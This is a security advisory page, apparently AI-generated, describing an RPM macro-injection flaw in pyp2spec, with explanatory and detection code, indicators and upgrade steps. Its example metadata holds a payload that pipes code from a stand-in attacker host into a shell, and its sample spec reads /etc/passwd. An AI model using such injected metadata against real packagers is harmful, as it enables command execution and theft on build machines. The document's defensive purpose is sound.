CVE-2026-42301 Overview
CVE-2026-42301 is an input validation vulnerability [CWE-20] in pyp2spec, a tool that generates Fedora RPM spec files from Python projects on the Python Package Index (PyPI). Versions prior to 0.14.1 write PyPI package metadata, such as the summary field, directly into the generated spec file without escaping RPM macro directives. When a packager runs rpmbuild against the generated spec, the embedded macros execute as part of the build process. A malicious PyPI package can therefore execute arbitrary commands on the packager's build machine. The issue is patched in pyp2spec version 0.14.1.
Critical Impact
A crafted PyPI package can achieve arbitrary command execution on a Fedora packager's build host once the generated spec file is processed by rpmbuild.
Affected Products
- pyp2spec versions prior to 0.14.1
- Fedora packaging workflows that consume pyp2spec-generated spec files
- Build hosts running rpmbuild against untrusted PyPI metadata
Discovery Timeline
- 2026-05-09 - CVE-2026-42301 published to the National Vulnerability Database (NVD)
- 2026-05-13 - Last updated in NVD database
Technical Details for CVE-2026-42301
Vulnerability Analysis
pyp2spec automates the creation of RPM spec files for Python packages by pulling metadata directly from PyPI. The tool copies fields such as the project summary into spec file directives without sanitizing RPM macro syntax. RPM macros use the %{...} and %(...) constructs, where %(...) instructs rpmbuild to execute a shell command and inline its output. When a malicious package author embeds a macro expression into a metadata field, that expression is written verbatim into the spec file. The downstream packager then invokes rpmbuild, which evaluates the macros and runs the attacker's commands under the packager's account. Because rpm expands macros while parsing the spec, the command runs before any %prep or %build section executes; a source-only build (rpmbuild -bs) or a parse with rpmspec is enough to trigger it. This is a classic injection pattern where untrusted upstream data crosses into a code-evaluation context.
Root Cause
The root cause is missing escaping when serializing PyPI metadata into RPM spec directives. pyp2spec treats PyPI fields as inert text, but rpmbuild interprets % sequences as macro expansions, and a literal percent sign must be written as %% in spec syntax. Without escaping the % character or rejecting macro-bearing metadata, the tool allows attacker-controlled input to drive build-time execution.
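The following is an added illustration, not pyp2spec's own code, of the vulnerable pattern beside the hardened one. It renders a minimal spec from constructed PyPI metadata; with escape=False the summary is copied verbatim and carries a live %(...) expansion, with escape=True every % in the free-text fields is doubled so rpm reads it as a literal. Package name and version are assumed to have been validated elsewhere against PyPI's normalized character set; the macros the generator emits itself, such as %{?dist}, are written separately and stay live.

```python
# Constructed PyPI metadata, as an attacker could publish it. The %(...)
# construct is a shell expansion that rpmbuild evaluates while parsing the
# spec, before any build section runs.
MALICIOUS_SUMMARY = "Fast JSON parser %(curl -s http://attacker.example/x | sh)"
BENIGN_SUMMARY = "Reports progress as 50% done"


def escape_rpm_macros(text: str) -> str:
    """Neutralise macro syntax by doubling every '%'.

    In spec syntax '%%' expands to one literal '%', so doubling turns
    %(...), %{...} and bare %name references into inert text.  Apply it to
    PyPI-sourced free text only, never to macros the generator emits itself.
    """
    return text.replace("%", "%%")


def render_spec(name: str, version: str, summary: str, description: str,
                escape: bool) -> str:
    """Render a minimal spec from constructed metadata.

    escape=False reproduces the vulnerable pattern (metadata copied verbatim);
    escape=True is the hardened form.  name/version are assumed pre-validated.
    """
    clean = escape_rpm_macros if escape else (lambda s: s)
    return "\n".join([
        f"Name:           python-{name}",
        f"Version:        {version}",
        "Release:        1%{?dist}",                 # generator's own macro, stays live
        f"Summary:        {clean(summary)}",          # PyPI-sourced, must be escaped
        "License:        MIT",
        f"URL:            https://pypi.org/project/{name}/",
        f"Source:         %{{pypi_source {name}}}",
        "",
        "%description",
        clean(description),                          # PyPI-sourced, must be escaped
        "",
        "%prep",
        f"%autosetup -p1 -n {name}-%{{version}}",
        "",
    ])


def summary_line(spec: str) -> str:
    """Return the Summary: directive of a rendered spec."""
    return next(line for line in spec.splitlines() if line.startswith("Summary:"))


if __name__ == "__main__":
    for escape in (False, True):
        spec = render_spec("fastjson", "1.2.0", MALICIOUS_SUMMARY,
                           "A parser.", escape)
        print("hardened  " if escape else "vulnerable", summary_line(spec))
```

Feed the two rendered specs to rpmspec -P in a throwaway container to see the difference: the unescaped one executes the command during parsing, the escaped one prints the summary with a single literal percent sign.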
Attack Vector
Exploitation requires user interaction from a Fedora packager. The attacker publishes a PyPI package whose metadata contains RPM macro directives, such as a summary value that includes %(...). The packager runs pyp2spec against the package to generate a spec file. When the packager subsequently executes rpmbuild on that spec, the embedded macro executes with the packager's privileges on the local build host. The CVSS vector CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H (base score 7.8, High) reflects this local, user-interaction-dependent path with full impact on confidentiality, integrity, and availability.
No verified exploit code is publicly available. Technical specifics are documented in the GitHub Security Advisory GHSA-r35x-v8p8-xvhw.
Detection Methods for CVE-2026-42301
Indicators of Compromise
- Generated .spec files containing unexpected %(...) shell-evaluation macros inside metadata fields such as Summary: or %description.
- rpmbuild invocations spawning unexpected child processes such as sh, curl, wget, or python during the spec parsing phase.
- Outbound network connections initiated from build hosts during what should be offline metadata processing.
Detection Strategies
- Statically scan pyp2spec-produced spec files for the %( sequence in metadata-derived fields before passing them to rpmbuild. Treat %{lua: the same way, since rpm also evaluates Lua expansions at parse time, and remember that %% is the literal-percent escape and is inert.
- Audit installed pyp2spec versions across packaging workstations and continuous integration runners and flag any version below 0.14.1.
- Correlate PyPI package ingestion events with subsequent process execution on build hosts to identify anomalous command chains.
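An added example of the static scan from the first strategy above (example code written for this page, not part of pyp2spec or any Fedora tooling). It walks a spec, tracks whether it is inside the %description body, and reports metadata-derived lines that still carry a live %( or %{lua: expansion; the odd-run rule makes %%( inert and %%%( live, matching how rpm reads the literal-percent escape. The section list, the set of tags treated as PyPI-derived, and the sample spec are all constructed for the example; a strict mode flags any live expansion anywhere in the file, which is the sensible policy for generated specs that should contain none.

```python
import re
from pathlib import Path

# Sections that terminate a %description body (constructed list of the usual
# spec sections; extend it for local packaging conventions).
SECTION_RE = re.compile(
    r"^%(package|description|prep|generate_buildrequires|build|install|"
    r"check|files|changelog|pre|post|preun|postun)\b"
)

# Tags whose values a generator fills from PyPI metadata (assumed set).
METADATA_TAG_RE = re.compile(r"^(Summary|License|URL)\s*:", re.IGNORECASE)

# A '%(' or '%{lua:' preceded by an odd run of '%' is expanded by rpm;
# even runs are the '%%' literal escape and are inert.
LIVE_RE = re.compile(r"%+(\(|\{lua:)")


def live_macro(text: str) -> bool:
    """True when rpm would expand a shell or Lua macro in this text."""
    return any((len(m.group(0)) - len(m.group(1))) % 2 == 1
               for m in LIVE_RE.finditer(text))


def scan_spec_text(spec: str, strict: bool = False) -> list[tuple[int, str]]:
    """Return (line_no, line) for lines carrying a live %( or %{lua: macro.

    Default mode checks only metadata-derived lines (Summary/License/URL tags
    and the %description body); strict mode checks every line.
    """
    findings = []
    in_description = False
    for n, line in enumerate(spec.splitlines(), start=1):
        if SECTION_RE.match(line):
            in_description = line.startswith("%description")
            continue
        if strict or in_description or METADATA_TAG_RE.match(line):
            if live_macro(line):
                findings.append((n, line.rstrip()))
    return findings


def scan_spec_file(path: str, strict: bool = False) -> list[tuple[int, str]]:
    """Scan a spec file on disk; non-empty result means do not run rpmbuild."""
    return scan_spec_text(Path(path).read_text(encoding="utf-8"), strict)


# Constructed sample of what a vulnerable generator could emit.
SAMPLE_SPEC = """\
Name:           python-fastjson
Version:        1.2.0
Release:        1%{?dist}
Summary:        Fast JSON parser %(id > /tmp/pwned)
License:        MIT
URL:            https://pypi.org/project/fastjson/
Source:         %{pypi_source fastjson}

%description
A fast JSON parser, reported as 100%% compatible.
Benchmarks: %(cat /etc/passwd)

%prep
%autosetup -p1 -n fastjson-%{version}
%(echo hello)
"""

if __name__ == "__main__":
    for n, line in scan_spec_text(SAMPLE_SPEC, strict=True):
        print(f"line {n}: {line}")
```

Wire scan_spec_file into the packaging workflow as a gate between pyp2spec and rpmbuild (or fedpkg srpm, which parses the same file); the default mode answers the narrow question this advisory raises, and strict mode is the better baseline for generated specs.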
Monitoring Recommendations
- Enable process-creation logging on packager workstations and CI builders to capture child processes of rpmbuild.
- Monitor egress traffic from build environments and alert on connections that do not match expected mirrors or package repositories.
- Track changes to the pyp2spec package version in build images and require version 0.14.1 or later as a baseline.
How to Mitigate CVE-2026-42301
Immediate Actions Required
- Upgrade pyp2spec to version 0.14.1 or later on every system that generates Fedora spec files.
- Review any spec files generated by vulnerable versions and inspect metadata fields for %(...) or other macro constructs before building.
- Rebuild and re-verify packages that were produced with vulnerable pyp2spec versions from untrusted PyPI sources.
Patch Information
The maintainer released the fix in pyp2spec v0.14.1, which escapes RPM macro directives in PyPI-sourced metadata. Coordinated disclosure details are available in the GitHub Security Advisory GHSA-r35x-v8p8-xvhw.
Workarounds
- Manually inspect generated spec files and remove or escape any % sequences originating from PyPI metadata before invoking rpmbuild (a literal percent sign is written as %%).
- Run pyp2spec and rpmbuild inside an isolated, ephemeral build environment such as a container or mock chroot to contain potential command execution. Any tool that parses the spec (rpmspec, an SRPM build step, a spec linter) triggers the same macro expansion, so isolate every step that touches the file, not only the final rpmbuild.
- Restrict packaging workflows to vetted PyPI packages until the upgrade to 0.14.1 is deployed across all build hosts.
# Upgrade a pip-installed pyp2spec to the patched release
pip install --upgrade 'pyp2spec>=0.14.1'
# On Fedora hosts that use the distribution package instead
sudo dnf upgrade pyp2spec
# Verify that the installed version is 0.14.1 or later
pip show pyp2spec
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.